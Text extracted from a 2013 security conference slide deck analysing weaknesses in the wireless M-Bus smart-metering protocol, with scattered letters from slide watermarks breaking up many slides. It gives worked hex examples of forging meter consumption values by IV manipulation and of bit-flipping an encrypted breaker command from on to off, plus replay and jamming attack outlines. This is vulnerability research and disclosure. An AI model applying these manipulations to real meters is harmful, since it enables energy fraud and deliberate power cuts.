You are on page 1of 39

Energy Fraud and Orchestrated

Blackouts
Issues with Wireless Metering Protocols (wMBus)
RHUL ISG DL Weekend Conference, Sun Sept 8th 2013,
Egham
cyrill.brunschwiler@csnc.ch

Compass Security AG

Compass Security AG
Werkstrasse 20
P.O. Box 2038
www.csnc.ch CH-8645 Jona

Tel
+41 55 214 41
60
Fax +41 55 214 41
61
Slide 1
team@csnc.ch

Agenda
Intro
Making Of
Smart Grids
Smart Metering

Wireless M-Bus
Identified Issues
Practical Issues

Conclusion

Compass Security AG

www.csnc.ch

Slide 2

Intro

Compass Security AG

Compass Security AG
Werkstrasse 20
P.O. Box 2038
www.csnc.ch CH-8645 Jona

Tel
+41 55 214 41
60
Fax +41 55 214 41
61
Slide 3
team@csnc.ch

Intro Making Of
Thesis on Smart Energy
Summer 2011:
Got attention of wireless M-Bus
Autumn 2012:
Started MSc thesis
X-mas 2012: German BSI/OMS group published Security Report
X-mas 2012: Short mention of M-Bus being inadequate
February 2013: Spent some time digging through EN paperwork
February 2013: Spent some time in an M-Bus lab environment
March 2013: Finished analysis of M-Bus current resp. draft standards
March 2013: German BSI mentions wM-Bus security being insufficient
Summer 2013:
Publication at Black Hat USA

Thesis Contents
Introduction
Defensive part (identification of 43 controls for smart meters)
Offensive part (analysis of wireless M-Bus protocol vulnerabilities)

Compass Security AG

www.csnc.ch

Slide 4

Intro Smart Grids


Smart Grid Blue Print

Compass Security AG

www.csnc.ch

Slide 5

Intro Smart Metering


Metering Infrastructure Blue Print

Legend
DSODistribution System Operator
NANNeighbourhood Area Network

Wireless M-Bus

Compass Security AG

www.csnc.ch

Slide 6

Intro Smart Metering Collector


Collectors
Various Vendors
Neuhaus is just an example of
a Multi Utility Controller (MUC)

Support Head-end side


GPRS
Ethernet (Web Interface)
WLAN
WiMAX

Support Meter side


Wired Serial (RS-485)
Wired M-Bus
ZigBee
Wireless M-Bus

Compass Security AG

www.csnc.ch

Slide 7

Intro Smart Metering Collector GUI

Compass Security AG

www.csnc.ch

Slide 8

Intro Smart Metering Meter


Electricity Meters
Various Vendors
Kamstrup is just an example

Interfaces
Optical
Wired Interfaces
GPRS
ZigBee
Wireless M-Bus

Functionality
Meter reading
Pre-payment
Tariffs
Disconnect

Compass Security AG

www.csnc.ch

Slide 9

Wireless M-Bus

Compass Security AG

Compass Security AG
Werkstrasse 20
P.O. Box 2038
www.csnc.ch CH-8645 Jona

Tel
+41 55 214 41
60
Fax +41 55 214 41
61
Slide 10
team@csnc.ch

Application
Market segment
Popular in remote meter reading
Heat, Water, Gas, Electricity
15 million wireless devices deployed (figures from 2010)
Mainly spread across Europe

Usage
Remote meter reading
Drive-by meter reading
Meter maintenance and configuration
Becoming popular for smart metering applications
Tariff schemes, real-time-pricing
Demand-response
Pre-payment
Load-limit
Remote disconnect

Compass Security AG

www.csnc.ch

Slide 11

Protocol Overview

Compass Security AG

Compass Security AG
Werkstrasse 20
P.O. Box 2038
www.csnc.ch CH-8645 Jona

Tel
+41 55 214 41
60
Fax +41 55 214 41
61
Slide 12
team@csnc.ch

Protocol Overview - Data Link


Layer
First Block (Frame Header)
Example Capture (Sent by meter, CRCs removed)
1E 44 2D 2C 07 71 94 15 01 02 7A B3 00 10 85 BF 5C
93 72 04 76 59 50 24 16 93 27 D3 03 58 C8
Field

Value

Interpretation

Length

1E

30 bytes frame length (exclusive length byte)

07 71 94 15 01
02

Identification:
15 94 71 07 (little-endian)
Device Type: 02 (electricity meter)
Version:
01

Control
Manuf.
ID
Address

e
r
u
os

l
c
s
1
i from primary station,
#
D
44
Indicates message
E function
n
o
U
send/no reply (SND-NR)
i
t
S
a
S
I
m
r Coded for Kamstrup (KAM) calculated as
2D 2C
o
f
specified in prEN137573. ID is managed by
In
the flag association.

Compass Security AG

www.csnc.ch

Slide 13

Protocol Overview Application Layer


Data Header Example
Example Capture (Sent by meter, CRCs removed)
1E 44 2D 2C 07 71 94 15 01 02 7A B3 00 10 85 BF 5C
93 72 04 76 59 50 24 16 93 27 D3 03 58 C8

e
v
re

n
o
i
nt

Field

Valu
e

Interpretation

Access
number

B3

Current access number is 179. The standard


mandates to choose a random number on meter
start. The standard suggests to use timestamps and
sequence counters since ACC is insufficient to
prevent replay.

10
85

Encryption mode is 5h which is AES-128 in CBC mode.


10h indicates a single encrypted block containing
meter data (without signature). The field further
indicates a short window where the meter listens for
requests (8
h)
www.csnc.ch
Slide 14

Status field

p
y
p la

2 re
#
E
t
n
U
ISS fficie
u
s
00
is meter initiated and there are no alarms
In Message
or errors.

Configuration

Compass Security AG

Wireless M-Bus Sniffer


Protocol sniffers display wireless M-Bus data record contents
provided you know the key. The standard suggests at least 8
bytes of the key shall be different for each meter

3
#
t
E
r
U
o
IS S e , s h
n
o
N

Compass Security AG

s
d
an

www.csnc.ch

s
y
e
k
d
i
p
tu

Slide 15

wM-Bus Protocol Analysis

Compass Security AG

Compass Security AG
Werkstrasse 20
P.O. Box 2038
www.csnc.ch CH-8645 Jona

Tel
+41 55 214 41
60
Fax +41 55 214 41
61
Slide 16
team@csnc.ch

Encryption Modes
Dedicated Application Layer (DAL) Encryption Modes
0 no encryption
1 reserved
2 DES in CBC mode, zero IV
3 DES in CBC mode, non-zero IV
4 AES-128 in CBC mode, zero IV
d
n
a
5 AES-128 in CBC mode, non-zero IV 2
s
6 reserved for future use
e
d
o
7ff reserved
m

n
o
4
i
t
#
p
y Encryption Modes
E Layerc(ELL)
Extended Link
r
U
S encryption
n
0ISno
e
ak in CTR mode
1 AES-128
e
W

Compass Security AG

www.csnc.ch

Slide 17

Are we safe with AES?

Compass Security AG

Compass Security AG
Werkstrasse 20
P.O. Box 2038
www.csnc.ch CH-8645 Jona

Tel
+41 55 214 41
60
Fax +41 55 214 41
61
Slide 18
team@csnc.ch

Are we safe with AES?


Encryption Mode 4 (DAL)
AES-128 in CBC mode
All-zero IV
Uses static key k
C1 = Enck(P1 IV)

= Enck(P1 00 00 00 00)
n
o
i

= Enck(P1)
t
c
e
Equal PT result in same CT
et
d
n
Standard workaround
o
i
t
5
p
Standard mandates
to
prefix
value with date and time
#
m
E
u
U
s
record
S
n
o
IS and
c
Date
time (record type F) maximum granularity is
o
r
minutes
Ze

Side note
Type I and J records allow for a granularity of
seconds
Compass Security AG

www.csnc.ch

Slide 19

Is encryption mode 5 our friend?


Encryption Mode 5 (DAL)
AES-128 in CBC mode
n
Non-zero IV
o
i
t
p
Uses static key k
m
IV built from frame info and data header nsu
o
c
Mode 5, IV Example
o
r
e removed)
Example Capture (Sent by meter, zCRCs
t
1E 44 2D 2C 07 71 94 15 01te
02c 7A B3 00 10 85 BF 5C
e 27 D3 03 58 C8
93 72 04 76 59650 24 16d93

>
#
=
E
t
U
a
S
IS repe
IV s

Compass Security AG

www.csnc.ch

Slide 20

How about Counter Mode?


IV in encryption mode 1

ty
i
r
cu

e
s
CCSignal communication direction,
prioritise
frames
t
i
B
5
...
8
> field, session counter (4
SNEncryption
mode, time
=
7
bits) E # le IV
U
b
S
FNFrame
a
number
S
t
I
c
i
d
BCBlock
re counter
P

Predictable IVs result in 85-bits security due to


TMTO
How to get the key stream to repeat?
Cause device to reuse the same IV
Compass Security AG
www.csnc.ch

Slide 21

Can we adjust the device time?


Encryption in Special Protocols
Alarms and errors
Signalled within status byte
s
t
e
Header is not subject to encryption
es
r
Application resets (CI 50h) nd
a
s
Special upper layer protocol
r
o
r
9
r
Security
services
of the DAL and n
ELL do not apply
#
e
,
E
o
i
U
m
SClock
t
updates
i
r
t
s
laupper#layer
e
t
IS Special
8
a
p
n
protocol
e
e
ff
r
t
i
E
n
n
SSet, add
SUand subtracts
am (TC field)co

c
IS stre
i
l
b
y
0
u
e
K E #1 of p
n
U
o
i
S
IS rypt
c
n
E

Compass Security AG

www.csnc.ch

Slide 22

Issues with message integrity?

Compass Security AG

Compass Security AG
Werkstrasse 20
P.O. Box 2038
www.csnc.ch CH-8645 Jona

Tel
+41 55 214 41
60
Fax +41 55 214 41
61
Slide 23
team@csnc.ch

Integrity, Authentication Analysis


General
There are two mention on how one could approach authentication.
However there are neither authentication methods nor protocols
specified

DAL Integrity Protection

t
n
i
d

ty
i
r
eg

CRCs
There are CRCs at the frame level
CRCs are not considered integrity protection
Signatures
Encryption mode 5 and 6 can signal digitally signed billing data
Not widely used => due to meter display has priority
MACs
Not available

n
e
ut h

io
t
a
t ic

n
a
n

9
#
a
E of n
t
U
Manipulation
Ciphertexts
or IVs
S
e
S
I In CBC imode,
t the manipulation of ciphertexts is pointless
s
x
Manipulation
of the IV is difficult but feasible
e
In
Compass Security AG

www.csnc.ch

Slide 24

IV Manipulation Example
Example of Consumption Value Manipulation
P1' = Deck(C1) IV' => Deck(C1) = P1' IV' = P1 IV
P1' = P1 IV IV'

s
Precondition
d
Original value read from meter displayr 341
cmkWh (08
o
e
34 05 00 )
lu
a
Calculate Plaintext P1'
v
n
o
i
0
P1 2F 2F 04 83 3B
1 08 34 p05t 00 2F 2F
#
m
E71 94 15
IV 2D 2C 07
01 02 B3 B3 B3
u
s
U
SS2C r07co
IV'
71n94 15 01 05 B3 B3
I2D
e
B3
t
l
A 2F 04 83 3B 08 34 02 00 2F
P1'
2F
2F
Result
P1 144'392 Wh (08 34 02 00)
Compass Security AG

www.csnc.ch

2F 2F 2F 2F 2F
B3 B3 B3 B3 B3
B3 B3 B3 B3 B3
2F 2F 2F 2F 2F

Slide 25

Partial Encryption in wM-Bus


Partial Encryption
Dedicated Application Layer allows for partial encryption
How does the receiver handle doubled data records?
Expansion Attack Example
Value in CT: 04 83 3B 08 34 05 00 (341'000 Wh) n
1E 44 2D 2C 07 71 94 15 01
93 72 04 76 59 50 24 16 93

o
i
t
u
l
l
02 7A B3 00 p
10o 85 BF 5C
d
27 D3 c
03
58 C8
m
r
o
e

u 34 02 00 (144'392 Wh)
Value attached:104 83 3B
al08
25
93
08

1
v
#
n
E
io
44 S
2DU2C 07 p
71t 94 15
m
IS 04 76
u
72
59
50 24 16
s
n
o 00
34C05

Compass Security AG

01 02 7A B3 00 10 85 BF 5C
93 27 D3 03 58 C8 04 83 3B

www.csnc.ch

Slide 26

Integrity Analysis
ELL Manipulation Example
C = E7 8E 1B 7B 9D 86 (Intercepted Ciphertext)
P = CC 22 01 FD 1F 01 (On Command)
P = F1 47 01 FD 1F 00 (Off Command)
C = C P P
C = E7 8E 1B 7B 9D 86
CC 22 01 FD 1F 01
2
F1 47 01 FD 1F 00
1
# (Manipulated Ciphertext)
E
C = DA EB 1B 7B 9D
87
g
U
a
a
b
b

Compass Security AG

ISS flippin
Bit

www.csnc.ch

Slide 27

Which messages are affected?


Integrity with Special Protocols
No integrity protection at all
Alarms and errors
Application resets
Clock synchronization
Commands
Network management
Precision timing

3
1
# iffin
E
r
U
a
S
t
IS ng
o
r
W
Compass Security AG

d
m
C
,
g

www.csnc.ch

n
a
m

n
o
i
t
a
l
ipu

Slide 28

Practical Issues

Compass Security AG

Compass Security AG
Werkstrasse 20
P.O. Box 2038
www.csnc.ch CH-8645 Jona

Tel
+41 55 214 41
60
Fax +41 55 214 41
61
Slide 29
team@csnc.ch

Issues with Packet Replay


Shield and Replay I

Capture messages from original device


Shield device and replay messages

Compass Security AG

www.csnc.ch

Slide 30

Issues with Packet Replay


Shield and Replay II

Shield device, have a receiver with the device


Submit messages to collector at maybe lower pace
Compass Security AG

www.csnc.ch

Slide 31

Issues with Packet Replay


Jam and Replay

Collector
Sender Device

Compass Security AG

www.csnc.ch

Meter

Slide 32

Orchestrated Blackouts
Prepare Attack
Drop Devices
War Drive
Setup Sender
Bring Flashlight !

Compass Security AG

www.csnc.ch

Slide 33

Conclusion

Compass Security AG

Compass Security AG
Werkstrasse 20
P.O. Box 2038
www.csnc.ch CH-8645 Jona

Tel
+41 55 214 41
60
Fax +41 55 214 41
61
Slide 34
team@csnc.ch

Conclusion
I picture is worth a thousand words

Compass Security AG

www.csnc.ch

Slide 35

Conclusion
General Issues
Key size 64 bits
Zero consumption detection
Disclosure of consumption values
Plaintext errors and alarms
Information Disclosure
Man-in-the-middle in routed environments
Key disclosure

Energy Fraud
Manipulation of consumption value

Orchestrated Blackouts
Manipulation of valve and breaker open/close commands

Compass Security AG

www.csnc.ch

Slide 36

Outlook
Counter Measures
Efforts of the OMS Group and the German Federal Office for Information
Security (BSI Germany)
Integrity-preserving authentication and fragmentation layer (AFL),
Additional encryption mode relying on AES-128 in CBC mode using
ephemeral keys
TLS 1.2 support for wM-Bus
Published on X-Mas 2012
Looks promising, no independent public analysis so far

Compass Security AG

www.csnc.ch

Slide 37

Battery pack empty.

Compass Security AG

www.csnc.ch

Slide 38

Presentation
http://www.csnc.ch/misc/files/2013/energy_fraud_and_blackouts.pdf
Whitepaper
http://www.csnc.ch/misc/files/2013/wmbus_security_whitepaper.pdf
Sniffer & MUC (credits lukas@statuscode.ch)
https://github.com/CBrunsch/WMBus-Sniffer-MUC
Python Sniffer Scambus
https://github.com/CBrunsch/scambus
GNU Radio wM-Bus (credits neundorf@kde.org)
https://github.com/oWCTejLVlFyNztcBnOoh/gr-wmbus
Cliparts
http://openclipart.org
Compass Security AG

www.csnc.ch

Slide 39